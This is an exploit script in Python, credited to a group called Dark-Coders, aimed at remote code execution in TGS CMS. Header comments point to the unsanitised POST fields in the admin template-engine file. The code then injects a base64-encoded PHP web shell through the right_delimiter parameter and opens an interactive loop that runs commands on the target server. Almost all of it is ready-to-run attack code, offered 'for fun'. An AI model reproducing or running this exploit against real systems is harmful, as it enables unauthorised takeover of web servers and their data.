#			TGS CMS Remote Code Execution Exploit=0D
#					by 0in=0D
#				from Dark-Coders Group!=0D
#				 www.dark-coders.pl=0D 
# Contact: 0in(dot)email[at]gmail(dot)com=0D
# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke=0D
# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot=0D
# Let's analyze the vuln:=0D
# We've got the: /cms/admin/admin.template_engine.php =0D
# first line:"template_dir    = "'.$_POST['template_dir'].'"; =0D
# 78:$tgs_template->config_dir      = "'.$_POST['config_dir'].'"; =0D
# 79:$tgs_template->cms_dir		  = "'.$_POST['cms_dir'].'";=0D
# 80:$tgs_template->left_delimiter  = "'.$_POST['left_delimiter'].'";=0D
# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";=0D
# And.. boom!=0D
# 89:	if (@fwrite($handle,$content)) {=0D
# Just simply exploit for fun:=0D
import httplib=0D
import urllib=0D
print "TGS CMS Remote Code Execution Exploit"=0D
print "by 0in From Dark-Coders Group"=0D
print "www.dark-coders.pl"=0D 
print 'Enter target:'=0D
target=raw_input()=0D
print 'Enter path:'=0D
path=raw_input()=0D
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"=0D
exploit=httplib.HTTPConnection(target+':80')=0D
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}=0D
data=urllib.urlencode({'right_delimiter':inject})=0D
exploit.request("POST",path+"/cms/admin/admin.template_engine.php?option=set_template",data,headers)=0D
print exploit.getresponse().read()=0D
while(1):=0D
	cmd=raw_input("[shell@"+target+"]#")=0D
	if(cmd=='exit'):=0D
		quit()=0D
	shell=httplib.HTTPConnection(target+':80')=0D
	shell.request("GET",path+"/cms/index.php?zuo="+cmd)=0D
	print shell.getresponse().read()=0D
=0D
	=0D
	=0D
=0D
	=0D